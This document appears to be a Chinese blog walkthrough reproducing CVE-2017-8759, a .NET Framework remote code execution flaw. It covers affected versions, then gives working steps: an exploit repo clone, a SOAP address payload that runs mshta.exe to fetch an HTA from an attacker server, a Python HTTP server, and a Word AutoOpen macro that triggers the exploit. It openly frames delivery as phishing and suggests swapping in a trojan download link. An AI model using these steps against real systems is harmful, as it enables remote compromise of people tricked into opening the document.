CVE-2017-8759-微软.net远程代码执行漏洞复现

基本信息

漏洞名称:.NET Framework远程代码执行漏洞
漏洞编号:CVE-2017-8759
漏洞影响:.NET系列产品的远程代码执行(RCE)并进一步控制系统
利用场景:远程钓鱼、社会工程(打开有惊喜哟)
影响版本:以下.NET版本
Microsoft .NET Framework 4.6.2
Microsoft .NET Framework 4.6.1
Microsoft .NET Framework 3.5.1
Microsoft .NET Framework 4.7
Microsoft .NET Framework 4.6
Microsoft .NET Framework 4.5.2
Microsoft .NET Framework 3.5
Microsoft .NET Framework 2.0 SP2
影响产品:Office(word excel)Edge IE WinOS Skype Lync Sharepoint
加固方法:软件类漏洞,微软补丁会悄悄地告诉你
https://portal.msrc.microsoft.com/en-us/security-guidance

利用过程

简述

本次测试环境:Windows 2007 x64、Kali Linux X64、Python、Office Word 2016 X64

本次测试攻击利用Word宏,其他方法暂未测试.

从GitHub下载文件

git clone https://github.com/Voulnet/CVE-2017-8759-Exploit-sample.git

修改文件夹exploit.txt内容

<soap:address location="http://127.0.0.1:8080?C:\Windows\System32\mshta.exe?http://127.0.0.1:8080/cmd.hta"/>

soap标签内的ip地址替换成你的Web服务器地址

修改Http服务Ip地址

修改cmd.hta内容

本次不做修改,仅做测试[替换标注内容为木马下载链接或其他姿势进行远程攻击]

cmdhta修改

启动Http服务器

python -m SimpleHTTPServer 8080

新建word文档

可以利用从GitHub下载的word直接修改宏,在这里我给大家直接新建演示一次.

新建一个格式为doc的文档,内容自定义主要目的是利用社工诱导用户打开文档及相信该文档是正常文档未涉及钓鱼攻击.

新建宏步骤:视图-宏-宏名”AutoOpen”-创建,输入代码为:

Sub AutoOpen()
Set x = GetObject("soap:wsdl=http://127.0.0.1:8080/exploit.txt")
End Sub

同样上面的IP替换你的Http服务器地址

宏名

Ctrl+s保存一下,然后点右上角的word图标返回到word界面.

运行结果

由于我先前测试时启用了宏,所以没有提示,首次运行会提示需要启用宏.打开文档会生成三个文件在当前路径下.

运行结果

参考文章